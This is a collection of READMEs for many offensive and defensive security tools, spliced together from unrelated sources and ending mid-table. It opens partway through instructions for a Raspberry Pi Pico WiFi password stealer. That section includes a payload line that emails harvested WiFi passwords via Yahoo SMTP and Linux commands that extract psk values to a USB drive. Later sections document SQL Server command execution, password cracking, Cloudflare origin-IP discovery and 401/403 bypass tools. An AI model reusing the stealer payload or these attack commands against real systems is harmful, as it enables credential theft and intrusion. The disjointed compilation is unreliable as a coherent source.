file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587
Note:
After sending the data over email, the .txt file is deleted. You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you write in the payload.
Keep in mind that some networks could be blocking the usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
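The selection logic in code.py essentially comes down to reading whether GPIO5 is jumpered to ground. A simplified CircuitPython sketch of that idea (my own approximation, not the project's exact code):
# Approximate payload-selection logic: run payload2.dd when GPIO5 is grounded.
import board
import digitalio

pin = digitalio.DigitalInOut(board.GP5)
pin.direction = digitalio.Direction.INPUT
pin.pull = digitalio.Pull.UP          # reads False when jumpered to GND

payload_file = "payload2.dd" if not pin.value else "payload1.dd"
print("selected:", payload_file)      # the real code.py would execute this payload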
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less feasible.
STRING echo PASSWORD | sudo -S echo
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses an .ini-style keyfile format to store network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex in order to extract the data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion matches at a certain position in the string, i.e. at a position right after the keyword, without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
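To see the lookbehind in action outside the payload, here is a small Python check of the same pattern (illustrative; the keyfile content below is made up):
# Demonstrates the (?<=keyword).* lookbehind used by the payload.
import re

keyfile = """[wifi]
ssid=HomeNetwork

[wifi-security]
psk=SuperSecret123
"""  # made-up content in NetworkManager's .ini-style keyfile format

ssid = re.search(r"(?<=ssid=).*", keyfile).group()
psk = re.search(r"(?<=psk=).*", keyfile).group()
print(ssid, psk)  # -> HomeNetwork SuperSecret123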
For more information about NetworkManager, here are some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file (WiFi-password-stealer/resources/wifi_pass.txt):
Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3
One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees is a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND
) and pin 20 (GPIO15
). For more details visit this link.
Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py
script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
This pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy; actually it's quite the opposite: it's really bulky, especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock bug.
sudo.
The tool was published as part of research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation β Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation β Part 2"
PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.
Double-click the EXE binary and you will get the list of all named pipes.
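PipeViewer itself is a compiled GUI, but if you just want a quick list of pipe names to compare against, Python can enumerate them on Windows (an aside of mine, not a feature of the tool; names only, no permissions):
# Quick-and-dirty named pipe listing on Windows.
import os

for name in os.listdir(r"\\.\pipe\\"):   # the special named-pipe filesystem root
    print(name)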
We used Visual Studio to compile it.
When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:
Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File
We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjectManager package, which is flagged as a virus.
Note that James Forshaw talked about it here.
We can't change it because we depend on third-party DLL.
We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.
Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE
for more details.
For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.
PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.
PySQLRecon can be installed with pip3 install pysqlrecon
or by cloning this repository and running pip3 install .
All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV]
require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM]
can likely be run by normal users and do not require elevated privileges.
Support for impersonation ([I]) or execution on linked servers ([L]) is denoted at the end of the command description.
adsi [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enumerate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]
PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:
pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]
View global options:
pysqlrecon --help
View command specific options:
pysqlrecon [GLOBAL_OPTS] COMMAND --help
Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns, rows), with the --database flag.
Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.
Impersonate a user account while running a PySQLRecon command with the --impersonate flag.
--link and --impersonate are incompatible.
pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:
git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help
PySQLRecon is easily extensible - see the template and instructions in resources
MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.
MacMaster requires Python 3.6 or later.
$ git clone https://github.com/HalilDeniz/MacMaster.git
$ cd MacMaster
$ python setup.py install
$ macmaster --help
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]
MacMaster: Mac Address Changer
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value
--interface, -i: Specify the network interface.
--random, -r: Set a random MAC address.
--newmac, -nm: Set a specific MAC address.
--customoui, -co: Set a custom OUI for the MAC address.
--reset, -rs: Reset MAC address to the original value.
--version, -V: Show the version of the program.
$ macmaster.py -i eth0 -nm 00:11:22:33:44:55
$ macmaster.py -i eth0 -r
$ macmaster.py -i eth0 -rs
$ macmaster.py -i eth0 -co 08:00:27
$ macmaster.py -V
Replace eth0
with your desired network interface.
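For intuition on what --random and --customoui do under the hood, here is a hedged Python sketch (my own, not MacMaster's code) that builds a random MAC address, optionally keeping a fixed OUI prefix:
# Build a random MAC address; keep the vendor OUI (first three octets) if given.
import random

def random_mac(oui=None):
    if oui:                                  # e.g. "08:00:27", as in the example above
        head = oui.split(":")
    else:
        # locally administered, unicast first octet
        head = ["%02x" % ((random.randint(0, 255) & 0xFE) | 0x02)]
    tail = ["%02x" % random.randint(0, 255) for _ in range(6 - len(head))]
    return ":".join(head + tail)

print(random_mac())            # fully random, locally administered
print(random_mac("08:00:27"))  # random device part behind a fixed OUI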
You must run this script as root (or with sudo) for it to work properly, because changing a MAC address requires root privileges.
Contributions are welcome! To contribute to MacMaster, follow these steps:
For any inquiries or further information, you can reach me through the following channels:
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
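Under the hood, this kind of discovery is a broadcast ARP sweep. A short scapy sketch of the general technique (not NetProbe's actual code; the subnet is an example, and it needs root):
# Broadcast ARP who-has requests and print responders.
from scapy.all import ARP, Ether, srp

answered, _ = srp(
    Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="192.168.1.0/24"),
    timeout=2,
    verbose=False,
)
for _, reply in answered:
    print(reply.psrc, reply.hwsrc)  # IP and MAC address of each responding device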
You can download the program from the GitHub page.
$ git clone https://github.com/HalilDeniz/NetProbe.git
To install the required libraries, run the following command:
$ pip install -r requirements.txt
To run the program, use the following command:
$ python3 netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
-h, --help: show this help message and exit
-t, --target: Target IP address or subnet (default: 192.168.1.0/24)
-i, --interface: Interface to use (default: None)
-l, --live: Enable live tracking of devices
-o, --output: Output file to save the results
-m, --manufacturer: Filter by manufacturer (e.g., 'Apple')
-r, --ip-range: Filter by IP range (e.g., '192.168.1.0/24')
-s, --scan-rate: Scan rate in seconds (default: 5)
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l
$ python3 netprobe.py --help
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
NetProbe: Network Scanner Tool
options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)
$ python3 netprobe.py
You can enable live tracking of devices on your network by using the -l
or --live
flag. This will continuously update the device list every 5 seconds.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l
You can save the scan results to a file by using the -o
or --output
flag followed by the desired output file name.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
IP Address | MAC Address | Packet Size | Manufacturer |
---|---|---|---|
192.168.1.1 | **:6e:**:97:**:28 | 102 | ASUSTek COMPUTER INC. |
192.168.1.3 | 00:**:22:**:12:** | 102 | InPro Comm |
192.168.1.2 | **:32:**:bf:**:00 | 102 | Xiaomi Communications Co Ltd |
192.168.1.98 | d4:**:64:**:5c:** | 102 | ASUSTek COMPUTER INC. |
192.168.1.25 | **:49:**:00:**:38 | 102 | Unknown |
If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:
This program is released under the MIT LICENSE. See LICENSE for more information.
CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.
Key Features:
Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.
Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.
Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.
Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.
With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
- Still in the development phase; sometimes it can't detect the real IP.
- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.
1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.
2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.
3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.
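Conceptually, the subdomain technique reduces to: resolve candidate subdomains and flag any IP that falls outside Cloudflare's published ranges. A toy Python sketch of that idea (mine, not the tool's code; the range list is truncated and the subdomains are made up):
# Toy version of the technique: resolve subdomains, flag non-Cloudflare IPs.
import socket
import ipaddress

# Two of Cloudflare's published IPv4 ranges, for illustration only.
CLOUDFLARE_RANGES = [ipaddress.ip_network(c) for c in ("104.16.0.0/13", "172.64.0.0/13")]

def behind_cloudflare(ip):
    return any(ipaddress.ip_address(ip) in net for net in CLOUDFLARE_RANGES)

for sub in ("mail", "dev", "staging"):          # example wordlist entries
    host = f"{sub}.example.com"
    try:
        ip = socket.gethostbyname(host)
    except socket.gaierror:
        continue
    if not behind_cloudflare(ip):
        print("possible origin IP:", host, ip)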
How to Use:
Run CloakQuest3r with a single command-line argument: the target domain you want to analyze.
git clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
pip3 install -r requirements.txt
python cloakquest3r.py example.com
The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.
If Cloudflare is detected, CloakQuest3r will scan for subdomains and identify their real IP addresses.
You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.
Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.
CloakQuest3r simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.
Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r
PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.
Clone the repository:
git clone https://github.com/HalilDeniz/PassBreaker.git
Install the required dependencies:
pip install -r requirements.txt
python passbreaker.py <password_hash> <wordlist_file> [--algorithm]
Replace <password_hash>
with the target password hash and <wordlist_file>
with the path to the wordlist file containing potential passwords.
--algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
-s, --salt <salt>: Specify a salt value to use.
-p, --parallel: Enable parallel processing for faster cracking.
-c, --complexity: Evaluate password complexity before cracking.
-b, --brute-force: Perform a brute force attack.
--min-length <min_length>: Set the minimum password length for brute force attacks.
--max-length <max_length>: Set the maximum password length for brute force attacks.
--character-set <character_set>: Set the character set to use for brute force attacks.
Here are some more usage examples:
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5
This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123
This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity
This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123
This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel
This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.
These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.
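The heart of a wordlist attack like the first example is only a few lines. A minimal Python sketch (illustrative unsalted MD5 cracking, not PassBreaker's actual code):
# Minimal wordlist attack: hash each candidate and compare to the target.
import hashlib

target = "5f4dcc3b5aa765d61d8327deb882cf99"  # the hash from the examples above
with open("passwords.txt") as wordlist:
    for line in wordlist:
        candidate = line.strip()
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            print("match:", candidate)
            break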
This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.
Contributions are welcome! To contribute to PassBreaker, follow these steps:
If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:
PassBreaker is released under the MIT License. See LICENSE for more information.
C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.
To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.
After acquiring your API key, execute the following command to search servers:
c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]
Replace <TARGET_DOMAIN>
with the desired IP address or domain, <TARGET_PORT>
with the port you wish to scan, and <API_KEY>
with your Netlas API key. Use the optional -v flag for verbose output. For example, to search google.com on port 443 using the Netlas API key 1234567890abcdef, enter:
c2detect -t google.com -p 443 -s 1234567890abcdef
To download a release of the utility, follow these steps:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>
To build and start the Docker container for this project, run the following commands:
docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v
To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:
./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help
This will display the help message with available options. To search for C2 servers, run the following command:
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>
This will display a list of C2 servers found in the given IP address or domain.
Name | Support |
---|---|
Metasploit | β |
Havoc | β |
Cobalt Strike | β |
Bruteratel | β |
Sliver | β |
DeimosC2 | β |
PhoenixC2 | β |
Empire | β |
Merlin | β |
Covenant | β |
Villain | β |
Shad0w | β |
PoshC2 | β |
If you'd like to contribute to this project, please feel free to create a pull request.
This project is licensed under the License - see the LICENSE file for details.
Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
It enables investigators to identify suspicious artifacts in ICS environments and detect compromised devices during incident response or manual checks.
Being an open source framework, it allows investigators to verify the actions of the tool or customize it to specific needs.
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
git clone https://github.com/microsoft/ics-forensics-tools.git
Install python requirements
pip install -r requirements.txt
Args | Description | Required / Optional |
---|---|---|
-h , --help
| show this help message and exit | Optional |
-s , --save-config
| Save config file for easy future usage | Optional |
-c , --config
| Config file path, default is config.json | Optional |
-o , --output-dir
| Directory in which to output any generated files, default is output | Optional |
-v , --verbose
| Log output to a file as well as the console | Optional |
-p , --multiprocess
| Run in multiprocess mode by number of plugins/analyzers | Optional |
Args | Description | Required / Optional |
---|---|---|
-h , --help
| show this help message and exit | Optional |
--ip | Addresses file path, CIDR or IP addresses csv (ip column required). add more columns for additional info about each ip (username, pass, etc...) | Required |
--port | Port number | Optional |
--transport | tcp/udp | Optional |
--analyzer | Analyzer name to run | Optional |
python driver.py -s -v PluginName --ip ips.csv
python driver.py -s -v PluginName --analyzer AnalyzerName
python driver.py -s -v -c config.json --multiprocess
from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig
forensic = ForensicClient()
plugin = PluginConfig.from_json({
"name": "PluginName",
"port": 123,
"transport": "tcp",
"addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
"parameters": {
},
"analyzers": []
})
forensic.scan([plugin])
When developing locally make sure to mark src folder as "Sources root"
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport
class GeneralCLI(PluginCLI):
    def __init__(self, folder_name):
        super().__init__(folder_name)
        self.name = "General"
        self.description = "General Plugin Description"
        self.port = 123
        self.transport = Transport.TCP

    def flags(self, parser):
        self.base_flags(parser, self.port, self.transport)
        parser.add_argument('--general', help='General additional argument', metavar="")

class General(PluginInterface):
    def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
        super().__init__(config, output_dir, verbose)

    def connect(self, address):
        self.logger.info(f"{self.config.name} connect")

    def export(self, extracted):
        self.logger.info(f"{self.config.name} export")
Add an import for your new plugin in the __init__.py file under the plugins folder.
from pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig
class General(AnalyzerInterface):
    def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
        super().__init__(config, output_dir, verbose)
        self.plugin_name = 'General'
        self.create_output_dir(self.plugin_name)

    def analyze(self):
        pass
Add an import for your new analyzer in the __init__.py file under the analyzers folder.
Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.
Section 52 under MSRC blog
ICS Lecture given about the tool
Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube
This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.
When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.
This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.
This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.
Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.
Install requirements
pip3 install -r requirements.txt
Run the script
python3 forbidden_buster.py -u http://example.com
Forbidden Buster accepts the following arguments:
-h, --help show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to request body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)
Example Usage:
python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent
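The bypass techniques the tool automates mostly amount to replaying the request with alternative headers and path variants and watching for a status change. A bare-bones Python sketch of that idea (mine, with a tiny example payload set; not Forbidden Buster's code):
# Replay a forbidden request with common bypass headers, report status changes.
import requests

url = "http://example.com/secret"
header_payloads = [                      # small example set of well-known tricks
    {"X-Forwarded-For": "127.0.0.1"},
    {"X-Original-URL": "/secret"},
    {"X-Rewrite-URL": "/secret"},
]
baseline = requests.get(url).status_code
for headers in header_payloads:
    status = requests.get(url, headers=headers).status_code
    if status != baseline:
        print(f"{headers} -> {status} (baseline {baseline})")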
Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!
Clone the repository:
git clone https://github.com/HalilDeniz/CryptoChat.git
Navigate to the project directory:
cd CryptoChat
Install the required dependencies:
pip install -r requirements.txt
$ python3 server.py --help
usage: server.py [-h] [--host HOST] [--port PORT]
Start the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
--------------------------------------------------------------------------
$ python3 client.py --help
usage: client.py [-h] [--host HOST] [--port PORT]
Connect to the chat server.
options:
-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.
$ python3 serverE.py --help
usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]
Start the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=0.0.0.0)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
--------------------------------------------------------------------------
$ python3 clientE.py --help
usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]
Connect to the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=127.0.0.1)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
--help: show this help message and exit
--host: The IP address to bind the server to.
--port: The port number to bind the server to.
--key: The secret key for encryption.
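As a rough picture of what a shared --key buys you, here is a hedged Python sketch of password-based symmetric encryption using the cryptography package (an illustration of the general idea, not necessarily CryptChat's actual scheme):
# Derive a Fernet key from a shared password and round-trip a message.
import base64
import hashlib
from cryptography.fernet import Fernet

password = "mysecretpassword"  # the default --key value from the help text
key = base64.urlsafe_b64encode(hashlib.sha256(password.encode()).digest())
box = Fernet(key)

token = box.encrypt(b"hello over the wire")  # ciphertext sent to the peer
print(box.decrypt(token))                    # the peer recovers the plaintext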
Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.
If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:
Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.
Afuzz is being actively developed by @rapiddns
git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install
OR
pip install afuzz
afuzz -u http://testphp.vulnweb.com -t 30
Table
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
